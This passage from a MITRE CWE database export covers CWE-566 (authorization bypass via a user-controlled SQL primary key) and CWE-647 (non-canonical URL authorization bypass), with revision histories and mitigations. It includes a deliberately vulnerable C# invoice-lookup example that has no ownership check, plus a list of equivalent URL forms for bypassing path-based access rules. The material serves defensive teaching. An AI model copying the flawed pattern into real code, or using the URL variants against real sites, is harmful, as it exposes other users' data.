"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2018-03-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2019-06-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Alternate_Terms",
"ModificationDate": "2020-06-25",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-12-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Alternate_Terms",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2024-02-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-02-29",
"ModificationVersion": "4.14",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2011-03-29",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Access Control Bypass Through User-Controlled Key",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "863",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect \"sources\" (origins of input) with \"sinks\" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)",
"DetectionMethodID": "DM-14",
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following code uses a parameterized statement, which escapes metacharacters and prevents SQL injection vulnerabilities, to construct and execute a SQL query that searches for an invoice matching the specified identifier [1]. The identifier is selected from a list of all invoices associated with the current authenticated user.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t...\n\t conn = new SqlConnection(_ConnectionString);\n\t conn.Open();\n\t int16 id = System.Convert.ToInt16(invoiceID.Text);\n\t SqlCommand query = new SqlCommand( \"SELECT * FROM invoices WHERE id = @id\", conn);\n\t query.Parameters.AddWithValue(\"@id\", id);\n\t SqlDataReader objReader = objCommand.ExecuteReader();\n\t ... \n```",
"IntroText": null,
"Language": "C#",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "The problem is that the developer has not considered all of the possible values of id. Although the interface generates a list of invoice identifiers that belong to the current user, an attacker can bypass this interface to request any desired invoice. Because the code in this example does not check to ensure that the user has permission to access the requested invoice, it will display any invoice, even if it does not belong to the current user.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-195"
}
] | null | null |
High
| null | 1
|
[
[
"284",
"285",
"863",
"639"
]
] |
[
"566"
] |
566
|
Authorization Bypass Through User-Controlled SQL Primary Key
|
Variant
|
Simple
|
Incomplete
|
The product uses a database table that includes records that should not be accessible to an actor, but it executes a SQL statement with a primary key that can be controlled by that actor.
|
When a user can set a primary key to any value, then the user can modify the key to point to unauthorized records.
Database access control errors occur when:
- Data enters a program from an untrusted source.
- The data is used to specify the value of a primary key in a SQL query.
- The untrusted source does not have the permissions to be able to access all rows in the associated table.
|
[
{
"Class": null,
"Name": "Database Server",
"Prevalence": "Often",
"Type": "Technology"
}
] | null |
[
{
"Note": "COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic.",
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Read Application Data",
"Modify Application Data",
"Bypass Protection Mechanism"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Access Control"
]
}
] |
[
{
"Description": "Assume all input is malicious. Use a standard input validation mechanism to validate all input for length, type, syntax, and business rules before accepting the data. Use an \"accept known good\" validation strategy.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
},
{
"Description": "Use a parameterized query AND make sure that the accepted values conform to the business rules. Construct your SQL statement accordingly.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] | null | null |
[
{
"EntryID": "SFP25",
"EntryName": "Tainted input to variable",
"MappingFit": null,
"TaxonomyName": "Software Fault Patterns"
}
] | null | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "Anonymous Tool Vendor (under NDA)",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Other_Notes, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, Taxonomy_Mappings",
"ModificationDate": "2009-07-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2010-06-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Demonstrative_Examples, Name",
"ModificationDate": "2011-03-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Modes_of_Introduction, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2024-02-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-02-29",
"ModificationVersion": "4.14",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2011-03-29",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Access Control Bypass Through User-Controlled SQL Primary Key",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "639",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect \"sources\" (origins of input) with \"sinks\" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)",
"DetectionMethodID": "DM-14",
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following code uses a parameterized statement, which escapes metacharacters and prevents SQL injection vulnerabilities, to construct and execute a SQL query that searches for an invoice matching the specified identifier [1]. The identifier is selected from a list of all invoices associated with the current authenticated user.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t...\n\t conn = new SqlConnection(_ConnectionString);\n\t conn.Open();\n\t int16 id = System.Convert.ToInt16(invoiceID.Text);\n\t SqlCommand query = new SqlCommand( \"SELECT * FROM invoices WHERE id = @id\", conn);\n\t query.Parameters.AddWithValue(\"@id\", id);\n\t SqlDataReader objReader = objCommand.ExecuteReader();\n\t ... \n```",
"IntroText": null,
"Language": "C#",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "The problem is that the developer has not considered all of the possible values of id. Although the interface generates a list of invoice identifiers that belong to the current user, an attacker can bypass this interface to request any desired invoice. Because the code in this example does not check to ensure that the user has permission to access the requested invoice, it will display any invoice, even if it does not belong to the current user.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-195"
}
] | null | null | null | null | 1
|
[
[
"284",
"285",
"863",
"639",
"566"
]
] |
[] |
647
|
Use of Non-Canonical URL Paths for Authorization Decisions
|
Variant
|
Simple
|
Incomplete
|
The product defines policy namespaces and makes authorization decisions based on the assumption that a URL is canonical. This can allow a non-canonical URL to bypass the authorization.
|
If an application defines policy namespaces and makes authorization decisions based on the URL, but it does not require or convert to a canonical URL before making the authorization decision, then it opens the application to attack. For example, if the application only wants to allow access to http://www.example.com/mypage, then the attacker might be able to bypass this restriction using equivalent URLs such as:
- http://WWW.EXAMPLE.COM/mypage
- http://www.example.com/%6Dypage (alternate encoding)
- http://192.168.1.1/mypage (IP address)
- http://www.example.com/mypage/ (trailing /)
- http://www.example.com:80/mypage
Therefore it is important to specify access control policy that is based on the path information in some canonical form with all alternate encodings rejected (which can be accomplished by a default deny rule).
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": null,
"Name": "Web Server",
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Bypass Protection Mechanism"
],
"Likelihood": null,
"Note": "An attacker may be able to bypass the authorization mechanism to gain access to the otherwise-protected URL.",
"Scope": [
"Access Control"
]
},
{
"Impact": [
"Read Files or Directories"
],
"Likelihood": null,
"Note": "If a non-canonical URL is used, the server may choose to return the contents of the file, instead of pre-processing the file (e.g. as a program).",
"Scope": [
"Confidentiality"
]
}
] |
[
{
"Description": "Make access control policy based on path information in canonical form. Use very restrictive regular expressions to validate that the path is in the expected form.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Reject all alternate path encodings that are not in the expected canonical form.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
}
] | null | null |
[
{
"EntryID": "IDS02-J",
"EntryName": "Canonicalize path names before validating them",
"MappingFit": null,
"TaxonomyName": "The CERT Oracle Secure Coding Standard for Java (2011)"
}
] | null | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2008-01-30",
"SubmissionName": "Evgeny Lebanidze",
"SubmissionOrganization": "Cigital",
"SubmissionReleaseDate": "2008-01-30",
"SubmissionVersion": "Draft 8",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Name, Potential_Mitigations, Relationships",
"ModificationDate": "2008-10-14",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2009-10-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2010-12-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2011-03-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
